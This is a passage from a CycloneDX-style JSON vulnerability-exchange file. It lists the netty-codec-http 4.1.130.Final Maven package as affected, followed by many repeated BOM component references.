          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
